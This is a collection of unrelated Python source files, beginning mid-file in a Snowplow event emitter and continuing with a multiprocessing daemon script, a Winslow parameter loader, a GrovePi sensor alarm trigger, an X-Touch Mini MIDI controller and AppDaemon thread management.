        :param endpoint: The raw endpoint provided by the user
        :type endpoint: string
        :param protocol: The protocol to use - http or https
        :type protocol: protocol
        :param port: The collector port to connect to
        :type port: int | None
        :rtype: string
        """
        # GET events go to /i; POST batches go to the tp2 endpoint.
        if method == "get":
            path = "/i"
        else:
            path = "/com.snowplowanalytics.snowplow/tp2"
        if port is None:
            return protocol + "://" + endpoint + path
        else:
            return protocol + "://" + endpoint + ":" + str(port) + path

    @contract
    def input(self, payload):
        """
        Adds an event to the buffer.
        If the maximum size has been reached, flushes the buffer.

        :param payload: The name-value pairs for the event
        :type payload: dict(string:*)
        """
        # POSTed values must be strings so the JSON envelope is uniform.
        if self.method == "post":
            self.buffer.append({key: str(payload[key]) for key in payload})
        else:
            self.buffer.append(payload)
        if len(self.buffer) >= self.buffer_size:
            self.flush()

    # @task makes this method schedulable as a Celery job (see CeleryEmitter).
    @task(name="Flush")
    def flush(self):
        """
        Sends all events in the buffer to the collector.
        """
        logger.info("Attempting to send %s requests" % len(self.buffer))
        if self.method == "post":
            if self.buffer:
                data = json.dumps({
                    "schema": PAYLOAD_DATA_SCHEMA,
                    "data": self.buffer
                }, separators=(',', ':'))
                # Swap the buffer out before sending so callbacks see the
                # batch that was actually transmitted.
                temp_buffer = self.buffer
                self.buffer = []
                status_code = self.http_post(data).status_code
                if status_code == 200 and self.on_success is not None:
                    self.on_success(len(temp_buffer))
                elif self.on_failure is not None:
                    self.on_failure(0, temp_buffer)
        elif self.method == "get":
            # GET sends events one by one, collecting the ones that failed.
            success_count = 0
            unsent_requests = []
            status_code = None
            while len(self.buffer) > 0:
                payload = self.buffer.pop()
                status_code = self.http_get(payload).status_code
                if status_code == 200:
                    success_count += 1
                else:
                    unsent_requests.append(payload)
            if len(unsent_requests) == 0:
                if self.on_success is not None:
                    self.on_success(success_count)
            elif self.on_failure is not None:
                self.on_failure(success_count, unsent_requests)
        else:
            logger.warn(self.method + ' is not a recognised HTTP method. Use "get" or "post".')

    @contract
    def http_post(self, data):
        """
        Send one POST request and return the response.

        :param data: The array of JSONs to be sent
        :type data: string
        """
        logger.info("Sending POST request to %s..." % self.endpoint)
        logger.debug("Payload: %s" % data)
        r = requests.post(self.endpoint, data=data, headers={'content-type': 'application/json; charset=utf-8'})
        getattr(logger, "info" if r.status_code == 200 else "warn")("POST request finished with status code: " + str(r.status_code))
        return r

    @contract
    def http_get(self, payload):
        """
        Send one GET request and return the response.

        :param payload: The event properties
        :type payload: dict(string:*)
        """
        logger.info("Sending GET request to %s..." % self.endpoint)
        logger.debug("Payload: %s" % payload)
        r = requests.get(self.endpoint, params=payload)
        getattr(logger, "info" if r.status_code == 200 else "warn")("GET request finished with status code: " + str(r.status_code))
        return r

    def sync_flush(self):
        """
        Calls the flush method of the base Emitter class.
        This is guaranteed to be blocking, not asynchronous.
        """
        logger.debug("Starting synchronous flush...")
        # Call Emitter.flush explicitly so subclass overrides (which may be
        # asynchronous) are bypassed; the return value is unused.
        result = Emitter.flush(self)
        for t in self.threads:
            t.join(THREAD_TIMEOUT)
        logger.info("Finished synchrous flush")
class AsyncEmitter(Emitter):
    """
    Uses threads to send HTTP requests asynchronously
    """
    def flush(self):
        """
        Removes all dead threads, then creates a new thread which
        executes the flush method of the base Emitter class
        """
        # BUG FIX: Thread.isAlive() was removed in Python 3.9; is_alive()
        # is the portable spelling (available since Python 2.6).
        self.threads = [t for t in self.threads if t.is_alive()]
        logger.debug("Flushing thread running...")
        t = threading.Thread(target=super(AsyncEmitter, self).flush)
        self.threads.append(t)
        t.start()
class CeleryEmitter(Emitter):
    """
    Uses a Celery worker to send HTTP requests asynchronously.
    Works like the base Emitter class,
    but on_success and on_failure callbacks cannot be set.
    """
    def __init__(self, endpoint, protocol="http", port=None, method="get", buffer_size=None):
        # Callbacks are forced to None: the flush runs in a Celery worker
        # process which cannot call back into this process.
        super(CeleryEmitter, self).__init__(endpoint, protocol, port, method, buffer_size, None, None)

    def flush(self):
        """
        Schedules a flush task
        """
        # Emitter.flush is wrapped by @task, so .delay() enqueues it as an
        # asynchronous Celery job instead of running it inline.
        super(CeleryEmitter, self).flush.delay()
        logger.info("Scheduled a Celery task to flush the event queue")
class RedisEmitter(object):
    """
    Sends Snowplow events to a Redis database
    """
    @contract
    def __init__(self, rdb=None, key="snowplow"):
        """
        :param rdb: Optional custom Redis database
        :type rdb: redis | None
        :param key: The Redis key for the list of events
        :type key: string
        """
        if rdb is None:
            rdb = redis.StrictRedis()
        self.rdb = rdb
        self.key = key

    @contract
    def input(self, payload):
        """
        Appends one event, JSON-serialized, to the configured Redis list.

        :param payload: The event properties
        :type payload: dict(string:*)
        """
        logger.debug("Pushing event to Redis queue...")
        self.rdb.rpush(self.key, json.dumps(payload))
        logger.info("Finished sending event to Redis.")

    def flush(self):
        # Events are pushed immediately in input(); there is no buffer.
        logger.warn("The RedisEmitter class does not need to be flushed")

    def sync_flush(self):
        # Kept for interface compatibility with the other emitters.
        self.flush()
|
start.py | import multiprocessing
import os
import signal
import sys
import time
import RuntimeError
# Python 2: reload(sys) was historically paired with setdefaultencoding
# (the call below is commented out).
reload(sys)
# sys.setdefaultencoding("UTF-8")
# Directory containing this script; used for the log directories in main.
base_dir = os.path.split(os.path.abspath(sys.argv[0]))[0]
class GracefulExitEvent(object):
    """Coordinates a graceful shutdown between the main process and its
    registered worker processes (Python 2 code)."""

    def __init__(self):
        # Worker Process handles registered via reg_worker().
        self.workers = []
        # Shared flag the workers poll to know when to stop.
        self.exit_event = multiprocessing.Event()
        # Use signal handler to throw exception which can be caught
        # by worker process to allow graceful exit.
        signal.signal(signal.SIGTERM, RuntimeError.AppExitException.sigterm_handler)
        pass

    def reg_worker(self, wp):
        # Register a worker process so wait_all() can join it later.
        self.workers.append(wp)
        pass

    def is_stop(self):
        # True once notify_stop() has been called in any process.
        return self.exit_event.is_set()

    def notify_stop(self):
        # Signal every worker to finish its current iteration and exit.
        self.exit_event.set()

    def wait_all(self):
        """Join all workers; on the SIGTERM-raised exception, broadcast the
        stop flag and keep waiting for the workers to finish."""
        while True:
            try:
                for wp in self.workers:
                    wp.join()
                print "main process(%d) exit." % os.getpid()
                break
            except RuntimeError.AppExitException:
                # SIGTERM arrived while joining: tell workers to stop, then
                # loop around and join them again.
                self.notify_stop()
                print "main process(%d) got GracefulExitException." % os.getpid()
            except Exception, ex:
                self.notify_stop()
                print "main process(%d) got unexpected Exception: %r" % (os.getpid(), ex)
                break
        pass
def worker_proc(gee):
import sys, time
print "worker(%d) start ..." % os.getpid()
try:
while not gee.is_stop():
# do task job here
print ".",
gee.wait(1)
else:
print ""
print "worker process(%d) got exit event." % os.getpid()
print "worker process(%d) do cleanup..." % os.getpid()
time.sleep(1)
print "[%d] 3" % os.getpid()
time.sleep(1)
print "[%d] 2" % os.getpid()
time.sleep(1)
print "[%d] 1" % os.getpid()
except RuntimeError.AppExitException:
print "worker(%d) got GracefulExitException" % os.getpid()
except Exception, ex:
print "Exception:", ex
finally:
print "worker(%d) exit." % os.getpid()
sys.exit(0)
def daemonize(stdin='/dev/null', stdout='/dev/null', stderr='/dev/null'):
    """Detach the process from the terminal (single fork + setsid) and
    redirect the standard streams to the given files (Python 2 code)."""
    try:
        pid = os.fork()
        if pid > 0:
            # Parent exits; the child carries on as the daemon.
            sys.exit(0)
    except OSError, e:
        sys.stderr.write("fork #1 failed: (%d) %s\n" % (e.errno, e.strerror))
        sys.exit(1)
    # Detach from the controlling terminal and reset the filesystem context.
    os.chdir("/")
    os.umask(0)
    os.setsid()
    # Flush before the underlying file descriptors are replaced.
    for f in sys.stdout, sys.stderr: f.flush()
    si = open(stdin, 'r')
    so = open(stdout, 'a+')
    se = open(stderr, 'a+', 0)  # buffering=0: unbuffered (Python 2 only)
    os.dup2(si.fileno(), sys.stdin.fileno())
    os.dup2(so.fileno(), sys.stdout.fileno())
    os.dup2(se.fileno(), sys.stderr.fileno())
if __name__ == '__main__':
    # Make sure the log directories exist next to the script.
    log_path = base_dir + '/log/'
    if not os.path.isdir(log_path):
        os.makedirs(log_path)
    run_path = base_dir + '/Run_Log/'
    if not os.path.isdir(run_path):
        os.makedirs(run_path)
    # daemonize('/dev/null', log_path + 'trace.log', log_path + 'error.log')
    # signal.signal(signal.SIGTERM, stop)
    import sys
    print "main process(%d) start" % os.getpid()
    gee = GracefulExitEvent()
    # Start some workers process and run forever
    for i in range(0, 10):
        wp = multiprocessing.Process(target=worker_proc, args=(gee,))
        wp.start()
        gee.reg_worker(wp)
    # Block until every worker has exited (or SIGTERM triggers shutdown).
    gee.wait_all()
    sys.exit(0)
|
Params_Winslow.py | # @sp: newly created
import sys
import os
import threading
import time
from datetime import datetime
from polyaxon_client.tracking import Experiment
from params import param_utils
import params.polyaxon_parsing as pp
from util.output_artifact_utils import define_prepare_mdl_path, \
define_prepare_tb_path
def get_file_inputs():
    """Append every line read from stdin to sys.argv until EOF."""
    try:
        while True:
            sys.argv.append(input())
    except EOFError:
        pass
class Params:
    """
    Description
    ----
    This enables the code to use winslow. Most of this is copied from Params (for Polyaxon).
    """
    # NOTE(review): everything below runs at class-definition (import) time,
    # including the thread start and the 10 second sleep.
    # This is to load the params from a file
    input_thread = threading.Thread(target=get_file_inputs, args=(), daemon=True)
    input_thread.start()
    print("Fetching inputs", end=" ... -> ")
    # Give the stdin reader thread time to collect the piped-in arguments.
    time.sleep(10)
    print("done.")
    temporal_context = 0
    last_interval = None
    # polyaxon params
    experiment = Experiment()
    plx = pp.get_parameters()
    param_utils.set_params(plx)
    param_utils.check_params(plx)
    # if the environment is within winslow
    if 'WINSLOW_PIPELINE_NAME' in os.environ:
        # output paths
        log_dir_mdl = "/workspace/mdl_chkpts/"
        if not os.path.exists(log_dir_mdl):
            os.mkdir(log_dir_mdl)
            print("Directory ", log_dir_mdl, " Created ")
        else:
            print("Directory ", log_dir_mdl, " already exists")
        file_path_mdl = "/workspace/mdl_chkpts/" + plx.get('mdl_architecture') + '_' + plx.get('eng_kind') + ".hdf5"
        logdir_tb = "/workspace/tf_logs/scalars" + datetime.now().strftime("%Y%m%d-%H%M%S")
        file_path_raw_mdl = "/workspace/mdl_chkpts/" + plx.get('mdl_architecture') + '_' + 'untrained' + ".hdf5"
    else:
        # output paths
        file_path_mdl, file_path_raw_mdl = define_prepare_mdl_path(plx)
        logdir_tb = define_prepare_tb_path()
def winslow_params(params, transferlearning=False):
    """
    If running on winslow, adjust the parameters according to winslow settings.

    :param params: object whose ``plx`` dict is updated from os.environ
    :param transferlearning: when True only the transfer-learning keys are read
    """
    if transferlearning:  # idiom: was `== True`
        params.plx['tl_stage'] = os.environ['tl_stage']
        params.plx['tl_mode'] = os.environ['tl_mode']
    else:
        # Integer-valued settings, read verbatim from the environment.
        int_keys = ('k_crossval', 'epochs', 'batch_size', 'train_count',
                    'val_count', 'test_count', 'l_epochs', 'l_subepochs',
                    'l_overlapping', 'filtersize')
        for key in int_keys:
            params.plx[key] = int(os.environ[key])
        # Flags are encoded as "0"/"1" in the environment.
        for key in ('load_model', 'apply_oversampling'):
            params.plx[key] = bool(int(os.environ[key]))
        # Float-valued settings; optimizer variables carry an 'o_' prefix
        # in the environment but not in plx.
        float_keys = {'lr': 'o_learning_rate',
                      'beta1': 'o_beta1',
                      'beta2': 'o_beta2',
                      'epsilon': 'o_epsilon',
                      'l_regularization_factor': 'l_regularization_factor'}
        for key, env_name in float_keys.items():
            params.plx[key] = float(os.environ[env_name])
|
Trigger.py | import grovepi
import time
from threading import Thread
# Connect the Grove PIR Motion Sensor to digital port D8
# SIG,NC,VCC,GND
pir_sensor = 8
grovepi.pinMode(pir_sensor,"INPUT")
# Connect the Grove Piezo Vibration Sensor to analog port A0
# OUT,NC,VCC,GND
piezo = 0
grovepi.pinMode(piezo,"INPUT")
class Trigger():
    """Reads the PIR motion and piezo vibration sensors once and sets the
    Firestore 'alarm' flag when both motion and vibration are detected."""
    def __init__(self, db):
        super().__init__()
        # Firestore document holding the alarm flag for this user/person.
        trigger_ref = db.collection(u'Users').document('y2wiAwN8e1e52SWtvVD3BNFiWGu2').collection('People').document('Indy').collection('Sensors').document('alarmCheck')
        #checkVibrate = Thread(target = Vibrationsensor)
        #checkMotion = Thread(target = Motionsensor)
        #print(checkMotion.getStatus)
        #checkVibrate.start()
        #checkMotion.start()
        try:
            if grovepi.digitalRead(pir_sensor):
                print('Motion Detected')
                # Vibration is only checked once motion has fired;
                # 100 is the analog threshold for "vibrating".
                if grovepi.analogRead(piezo) > 100:
                    print('Vibration detected')
                    trigger_ref.update({
                        u'alarm': True,
                    })
                else:
                    print('No vibration')
            else:
                print('Nothing detected')
            time.sleep(.5)
        except IOError:
            # GrovePi read failures surface as IOError.
            print("Error with trigger")
|
midicontroller.py | "See MidiController docstring"
# part of xair-remote.py
# Copyright (c) 2018, 2021 Peter Dikant
# Additions Copyright (c) 2021 Ross Dickson
# Some rights reserved. See LICENSE.
import threading
import time
import os
from mido import Message, open_input, open_output, get_input_names, get_output_names
class TempoDetector:
    """
    Detect song tempo via a tap button
    """
    _MAX_TAP_DURATION = 3.0
    current_tempo = 0.5
    # Button/channel whose LED blinks in tempo; -1 means "none assigned".
    number = -1

    def __init__(self, state):
        self.state = state
        self.midi_controller = state.midi_controller
        self.last_tap = 0
        self.tap_num = 0
        self.tap_delta = 0
        # Blink the assigned button LED in time with the detected tempo.
        worker = threading.Thread(target=self.blink)
        worker.daemon = True
        worker.start()

    def tap(self):
        """Register one tap; after two or more taps closer together than
        _MAX_TAP_DURATION, push the averaged interval to the mixer."""
        current_time = time.time()
        if current_time - self.last_tap > self._MAX_TAP_DURATION:
            # Start with new tap cycle
            self.tap_num = 0
            self.tap_delta = 0
        else:
            self.tap_num += 1
            self.tap_delta += current_time - self.last_tap
            if self.tap_num > 0:
                # Update tempo in mixer after at least 2 taps
                self.state.update_tempo(self.tap_delta / self.tap_num)
                self.current_tempo = self.tap_delta / self.tap_num
        self.last_tap = current_time

    def blink(self):
        """LED blink loop; runs in a daemon thread until quit is requested."""
        try:
            while self.state is not None and not self.state.quit_called:
                if self.number != -1:
                    # On for 20% of the beat, off for the remaining 80%.
                    self.midi_controller.set_channel_mute(self.number, "On")
                    time.sleep(self.current_tempo * 0.2)
                    self.midi_controller.set_channel_mute(self.number, "Off")
                    time.sleep(self.current_tempo * 0.8)
                else:
                    # BUG FIX: without a sleep this loop busy-spun at 100%
                    # CPU whenever no blink button was assigned.
                    time.sleep(self.current_tempo)
        except KeyboardInterrupt:
            if self.state is not None:
                self.state.shutdown()
            exit()
class MidiController:
"""
Handles communication with the MIDI surface.
X-Touch Mini must be in MC mode!
Fader 1-8: CC16 - CC23, Note 32 - 39 on push
Turn right: Values 1 - 10 (Increment)
Turn left: Values 65 - 72 (Decrement)
Buttons 1-8: Note 89, 90, 40, 41, 42, 43, 44, 45
Buttons 9-16: Note 87, 88, 91, 92, 86, 93, 94, 95
Buttons LA/LB (aka 17/18): Note 84/85
Master Fader: Pitch Wheel
"""
MC_CHANNEL = 0
# Note numbers of the 18 buttons in MC mode (rows 1-8, 9-16, then LA/LB).
MIDI_BUTTONS = [89, 90, 40, 41, 42, 43, 44, 45, 87, 88, 91, 92, 86, 93, 94, 95, 84, 85]
# Note numbers sent when encoders 1-8 are pushed.
MIDI_PUSH = [32, 33, 34, 35, 36, 37, 38, 39]
# CC numbers sent when encoders 1-8 are turned.
MIDI_ENCODER = [16, 17, 18, 19, 20, 21, 22, 23]
# CC numbers that drive the LED rings around encoders 1-8.
MIDI_RING = [48, 49, 50, 51, 52, 53, 54, 55]
# LED states used with set_button().
LED_OFF = 0
LED_BLINK = 1
LED_ON = 127
active_layer = 0
inport = None
outport = None
def __init__(self, state):
    """Open the X-Touch Mini MIDI ports, clear the surface, and start the
    listener (and optional connection-monitor) daemon threads."""
    self.state = state
    for name in get_input_names():
        if "x-touch mini" in name.lower():
            print('Using MIDI input: ' + name)
            try:
                self.inport = open_input(name)
            except IOError:
                print('Error: Can not open MIDI input port ' + name)
                self.state.quit_called = True
                self.state = None
                return
            break
    for name in get_output_names():
        if "x-touch mini" in name.lower():
            print('Using MIDI output: ' + name)
            try:
                self.outport = open_output(name)
            except IOError:
                # BUG FIX: this message wrongly said "input port".
                print('Error: Can not open MIDI output port ' + name)
                self.state.quit_called = True
                self.state = None
                return
            break
    if self.inport is None or self.outport is None:
        print('X-Touch Mini not found. Make sure device is connected!')
        self.state.quit_called = True
        self.cleanup_controller()
        return
    for i in range(0, 18):
        self.set_button(i, self.LED_OFF)  # clear all buttons
    worker = threading.Thread(target=self.midi_listener)
    worker.daemon = True
    worker.start()
    if self.state.monitor:
        print('Monitoring X-Touch connection enabled')
        monitor = threading.Thread(target=self.monitor_ports)
        monitor.daemon = True
        monitor.start()
def cleanup_controller(self):
"Cleanup mixer state if we see a quit call. Called from _init_ or worker thread."
for i in range(0, 18):
self.set_button(i, self.LED_OFF) # clear all buttons
for i in range(0,8):
self.set_ring(i,-1)
if self.inport is not None:
self.inport.close()
if self.outport is not None:
self.outport.close()
def monitor_ports(self):
"Method to exit if / when the X Touch disconnects"
try:
while not self.state.quit_called:
if self.inport.name not in get_input_names():
print("X-Touch disconnected - Exiting")
#os._exit(1)
self.state.quit_called = True
return
if self.state.quit_called:
return # end the thread if other threads have signed exit
time.sleep(1)
except KeyboardInterrupt:
if self.state is not None:
self.state.shutdown()
else:
self.cleanup_controller()
exit()
def midi_listener(self):
"Listen to midit inputs and respond."
try:
for msg in self.inport:
if self.state is None or self.state.quit_called:
self.cleanup_controller()
return
#print('Received {}'.format(msg))
if msg.type == 'control_change':
if msg.control in self.MIDI_ENCODER:
delta = msg.value
if delta > 64:
delta = (delta - 64) * -1
encoder_num = self.MIDI_ENCODER.index(msg.control)
LED = self.state.encoder_turn(encoder_num, delta)
self.set_ring(encoder_num, LED)
else:
print('Received unknown {}'.format(msg))
elif msg.type == 'note_on' and msg.velocity == 127:
if self.state.debug:
print('Note {} pushed'.format(msg.note))
if msg.note in self.MIDI_PUSH:
encoder_num = self.MIDI_PUSH.index(msg.note)
LED = self.state.encoder_press(encoder_num)
self.set_ring(encoder_num, LED)
elif msg.note in self.MIDI_BUTTONS:
button_num = self.MIDI_BUTTONS.index(msg.note)
LED = self.state.button_press(button_num)
self.set_channel_mute(button_num, LED)
else:
print('Received unknown {}'.format(msg))
elif msg.type == 'pitchwheel':
self.state.fader_move(msg)
elif msg.type != 'note_off' and msg.type != 'note_on':
print('Received unknown {}'.format(msg))
if self.state.quit_called:
self.state.shutdown()
return
except KeyboardInterrupt:
if self.state is not None:
self.state.shutdown()
else:
self.cleanup_controller()
exit()
def activate_bus(self):
"refresh the lights for the current layer"
# reset lights
for i in range(0, 8):
self.set_ring(i, self.state.get_encoder(i))
self.set_channel_mute(i, self.state.get_button(i))
for i in range(8, 18):
self.set_channel_mute(i, self.state.get_button(i))
def set_channel_mute(self, channel, LED):
"Send the mute value to the button"
if LED == "On" or LED == 0: # LED is sense Negative for mute
self.set_button(channel, self.LED_ON)
elif LED == "Off" or LED == 1: # LED is sense Negative for mute
self.set_button(channel, self.LED_OFF)
elif LED == "none":
return
else:
self.set_button(channel, self.LED_BLINK)
def set_ring(self, ring, value):
"Send the fader value to the encoder ring"
"Turn on the appropriate LEDs on the encoder ring."
# 0 = off, 1-11 = single, 17-27 = pan, 33-43 = fan, 49-54 = spread
# normalize value (0.0 - 1.0) to 0 - 11 range
# values below 0 mean disabled
if value >= 0.0:
self.outport.send(Message('control_change', channel=self.MC_CHANNEL,
control=self.MIDI_RING[ring],
value=self.map_lights(value)))
# value=33 + round(value * 11)))
else:
self.outport.send(Message('control_change', channel=self.MC_CHANNEL,
control=self.MIDI_RING[ring],
value=0))
def map_lights(self, value):
"map the (0:1) range of fader values to ring light patterns"
# for faders -oo to -10.2db map to single lights while -10 to +10 map to the fan
value = 1 + round(value * 21)
if value > 11:
value = value + 22
return value
def set_button(self, button, ch_on):
"Turn the button LED on or off"
self.outport.send(Message('note_on', channel=self.MC_CHANNEL,
note=self.MIDI_BUTTONS[button], velocity=ch_on))
|
threading.py | import asyncio
import threading
import datetime
from queue import Queue
from random import randint
import re
import sys
import traceback
import inspect
from datetime import timedelta
import logging
import functools
import iso8601
from appdaemon import utils as utils
from appdaemon.appdaemon import AppDaemon
class Threading:
    """Manages the pool of worker threads that execute app callbacks.

    Pinned apps always run on a fixed thread; unpinned callbacks are spread
    over the remaining threads by round-robin, random or load-based
    selection.  Also maintains the admin-namespace thread/callback sensors.
    """

    def __init__(self, ad: AppDaemon, kwargs):
        self.AD = ad
        self.kwargs = kwargs
        self.logger = ad.logging.get_child("_threading")
        self.diag = ad.logging.get_diag()
        self.thread_count = 0
        self.threads = {}
        # A few shortcuts
        self.add_entity = ad.state.add_entity
        self.get_state = ad.state.get_state
        self.set_state = ad.state.set_state
        self.add_to_state = ad.state.add_to_state
        self.add_to_attr = ad.state.add_to_attr
        self.auto_pin = True
        self.pin_threads = 0
        self.total_threads = 0
        # Setup stats
        self.current_callbacks_executed = 0
        self.current_callbacks_fired = 0
        self.last_stats_time = datetime.datetime(1970, 1, 1, 0, 0, 0, 0)
        self.callback_list = []

    async def get_q_update(self):
        """Publish the current queue depth of every worker thread."""
        for thread in self.threads:
            qsize = self.get_q(thread).qsize()
            await self.set_state("_threading", "admin", "thread.{}".format(thread), q=qsize)

    async def get_callback_update(self):
        """Update the rolling per-second fired/executed callback averages.

        Keeps a sliding window of the last 10 samples and averages over the
        wall-clock span of the window.
        """
        now = datetime.datetime.now()
        self.callback_list.append(
            {
                "fired": self.current_callbacks_fired,
                "executed": self.current_callbacks_executed,
                "ts": now
            })
        if len(self.callback_list) > 10:
            self.callback_list.pop(0)
        fired_sum = 0
        executed_sum = 0
        for item in self.callback_list:
            fired_sum += item["fired"]
            executed_sum += item["executed"]
        total_duration = (self.callback_list[-1]["ts"] - self.callback_list[0]["ts"]).total_seconds()
        if total_duration == 0:
            # single sample (or zero elapsed time) - avoid division by zero
            fired_avg = 0
            executed_avg = 0
        else:
            fired_avg = round(fired_sum / total_duration, 1)
            executed_avg = round(executed_sum / total_duration, 1)
        await self.set_state("_threading", "admin", "sensor.callbacks_average_fired", state=fired_avg)
        await self.set_state("_threading", "admin", "sensor.callbacks_average_executed", state=executed_avg)
        self.last_stats_time = now
        self.current_callbacks_executed = 0
        self.current_callbacks_fired = 0

    async def init_admin_stats(self):
        """Create the admin-namespace sensors used for thread statistics."""
        # Initialize admin stats
        await self.add_entity("admin", "sensor.callbacks_total_fired", 0)
        await self.add_entity("admin", "sensor.callbacks_average_fired", 0)
        await self.add_entity("admin", "sensor.callbacks_total_executed", 0)
        await self.add_entity("admin", "sensor.callbacks_average_executed", 0)
        await self.add_entity("admin", "sensor.threads_current_busy", 0)
        await self.add_entity("admin", "sensor.threads_max_busy", 0)
        await self.add_entity("admin", "sensor.threads_max_busy_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))
        await self.add_entity("admin", "sensor.threads_last_action_time", utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)))

    async def create_initial_threads(self):
        """Work out thread/pin counts from config and start the worker pool."""
        kwargs = self.kwargs
        if "threads" in kwargs:
            self.logger.warning(
                "Threads directive is deprecated apps - will be pinned. Use total_threads if you want to unpin your apps")
        if "total_threads" in kwargs:
            self.total_threads = kwargs["total_threads"]
            self.auto_pin = False
        else:
            # default: one thread per active app
            apps = await self.AD.app_management.check_config(True, False)
            self.total_threads = int(apps["active"])
        self.pin_apps = True
        utils.process_arg(self, "pin_apps", kwargs)
        if self.pin_apps is True:
            self.pin_threads = self.total_threads
        else:
            self.auto_pin = False
            self.pin_threads = 0
            if "total_threads" not in kwargs:
                self.total_threads = 10
        utils.process_arg(self, "pin_threads", kwargs, int=True)
        if self.pin_threads > self.total_threads:
            raise ValueError("pin_threads cannot be > total_threads")
        if self.pin_threads < 0:
            raise ValueError("pin_threads cannot be < 0")
        self.logger.info("Starting Apps with %s workers and %s pins", self.total_threads, self.pin_threads)
        self.next_thread = self.pin_threads
        self.thread_count = 0
        for i in range(self.total_threads):
            await self.add_thread(True)
        # Add thread object to track async
        await self.add_entity("admin", "thread.async", "idle",
                              {
                                  "q": 0,
                                  "is_alive": True,
                                  "time_called": utils.dt_to_str(datetime.datetime(1970, 1, 1, 0, 0, 0, 0)),
                                  "pinned_apps": []
                              }
                              )

    def get_q(self, thread_id):
        """Return the work queue for the given thread id."""
        return self.threads[thread_id]["queue"]

    @staticmethod
    def atoi(text):
        """Return *text* as an int if it is all digits, else unchanged."""
        return int(text) if text.isdigit() else text

    def natural_keys(self, text):
        """Sort key that orders embedded numbers numerically (thread-2 < thread-10)."""
        # BUG FIX: use a raw string for the regex - '(\d+)' is an invalid
        # escape sequence in a normal string literal.
        return [self.atoi(c) for c in re.split(r'(\d+)', text)]

    # Diagnostics

    def total_q_size(self):
        """Return the total number of queued callbacks across all threads."""
        qsize = 0
        for thread in self.threads:
            qsize += self.threads[thread]["queue"].qsize()
        return qsize

    def min_q_id(self):
        """Return the index of the thread with the shortest queue."""
        id = 0
        i = 0
        qsize = sys.maxsize
        for thread in self.threads:
            if self.threads[thread]["queue"].qsize() < qsize:
                qsize = self.threads[thread]["queue"].qsize()
                id = i
            i += 1
        return id

    async def dump_threads(self):
        """Log a diagnostic summary of every thread's state and queue."""
        self.diag.info("--------------------------------------------------")
        self.diag.info("Threads")
        self.diag.info("--------------------------------------------------")
        current_busy = await self.get_state("_threading", "admin", "sensor.threads_current_busy")
        max_busy = await self.get_state("_threading", "admin", "sensor.threads_max_busy")
        max_busy_time = utils.str_to_dt(await self.get_state("_threading", "admin", "sensor.threads_max_busy_time"))
        last_action_time = await self.get_state("_threading", "admin", "sensor.threads_last_action_time")
        self.diag.info("Currently busy threads: %s", current_busy)
        self.diag.info("Most used threads: %s at %s", max_busy, max_busy_time)
        self.diag.info("Last activity: %s", last_action_time)
        self.diag.info("Total Q Entries: %s", self.total_q_size())
        self.diag.info("--------------------------------------------------")
        for thread in sorted(self.threads, key=self.natural_keys):
            t = await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="all")
            # NOTE(review): leftover debug print - duplicates the diag line below
            print("thread.{}".format(thread), t)
            self.diag.info(
                "%s - qsize: %s | current callback: %s | since %s, | alive: %s, | pinned apps: %s",
                thread,
                t["attributes"]["q"],
                t["state"],
                t["attributes"]["time_called"],
                t["attributes"]["is_alive"],
                await self.get_pinned_apps(thread)
            )
        self.diag.info("--------------------------------------------------")

    #
    # Thread Management
    #

    def select_q(self, args):
        """Pick a worker thread for *args* and enqueue the callback.

        Pinned apps go to their pinned thread; unpinned work is distributed
        by the configured load_distribution (load / random / round-robin).
        """
        #
        # Select Q based on distribution method:
        #   Round Robin
        #   Random
        #   Load distribution
        #
        # Check for pinned app and if so figure correct thread for app
        if args["pin_app"] is True:
            thread = args["pin_thread"]
            # Handle the case where an App is unpinned but selects a pinned callback without specifying a thread
            # If this happens a lot, thread 0 might get congested but the alternatives are worse!
            if thread == -1:
                self.logger.warning("Invalid thread ID for pinned thread in app: %s - assigning to thread 0", args["name"])
                thread = 0
        else:
            if self.thread_count == self.pin_threads:
                raise ValueError("pin_threads must be set lower than threads if unpinned_apps are in use")
            if self.AD.load_distribution == "load":
                thread = self.min_q_id()
            elif self.AD.load_distribution == "random":
                thread = randint(self.pin_threads, self.thread_count - 1)
            else:
                # Round Robin is the catch all
                thread = self.next_thread
                self.next_thread += 1
                if self.next_thread == self.thread_count:
                    self.next_thread = self.pin_threads
        if thread < 0 or thread >= self.thread_count:
            raise ValueError("invalid thread id: {} in app {}".format(thread, args["name"]))
        id = "thread-{}".format(thread)
        q = self.threads[id]["queue"]
        q.put_nowait(args)

    async def check_overdue_and_dead_threads(self):
        """Restart dead worker threads and warn about long-running callbacks."""
        if self.AD.sched.realtime is True and self.AD.thread_duration_warning_threshold != 0:
            for thread_id in self.threads:
                # BUG FIX: Thread.isAlive() was removed in Python 3.9;
                # use is_alive() instead.
                if self.threads[thread_id]["thread"].is_alive() is not True:
                    self.logger.critical("Thread %s has died", thread_id)
                    self.logger.critical("Pinned apps were: %s", await self.get_pinned_apps(thread_id))
                    self.logger.critical("Thread will be restarted")
                    id = thread_id.split("-")[1]
                    await self.add_thread(silent=False, pinthread=False, id=id)
                if await self.get_state("_threading", "admin", "thread.{}".format(thread_id)) != "idle":
                    start = utils.str_to_dt(await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="time_called"))
                    dur = (await self.AD.sched.get_now() - start).total_seconds()
                    if dur >= self.AD.thread_duration_warning_threshold and dur % self.AD.thread_duration_warning_threshold == 0:
                        self.logger.warning("Excessive time spent in callback: %s - %s",
                                            await self.get_state("_threading", "admin", "thread.{}".format(thread_id), attribute="callback")
                                            , dur)

    async def check_q_size(self, warning_step, warning_iterations):
        """Warn (with escalating back-off) when total queue depth is too high.

        Returns the updated (warning_step, warning_iterations) counters.
        """
        totalqsize = 0
        for thread in self.threads:
            totalqsize += self.threads[thread]["queue"].qsize()
        if totalqsize > self.AD.qsize_warning_threshold:
            if (warning_step == 0 and warning_iterations >= self.AD.qsize_warning_iterations) or warning_iterations == self.AD.qsize_warning_iterations:
                for thread in self.threads:
                    qsize = self.threads[thread]["queue"].qsize()
                    if qsize > 0:
                        self.logger.warning("Queue size for thread %s is %s, callback is '%s' called at %s - possible thread starvation",
                                            thread, qsize,
                                            await self.get_state("_threading", "admin", "thread.{}".format(thread)),
                                            iso8601.parse_date(await self.get_state("_threading", "admin", "thread.{}".format(thread), attribute="time_called"))
                                            )
                await self.dump_threads()
                warning_step = 0
            warning_step += 1
            warning_iterations += 1
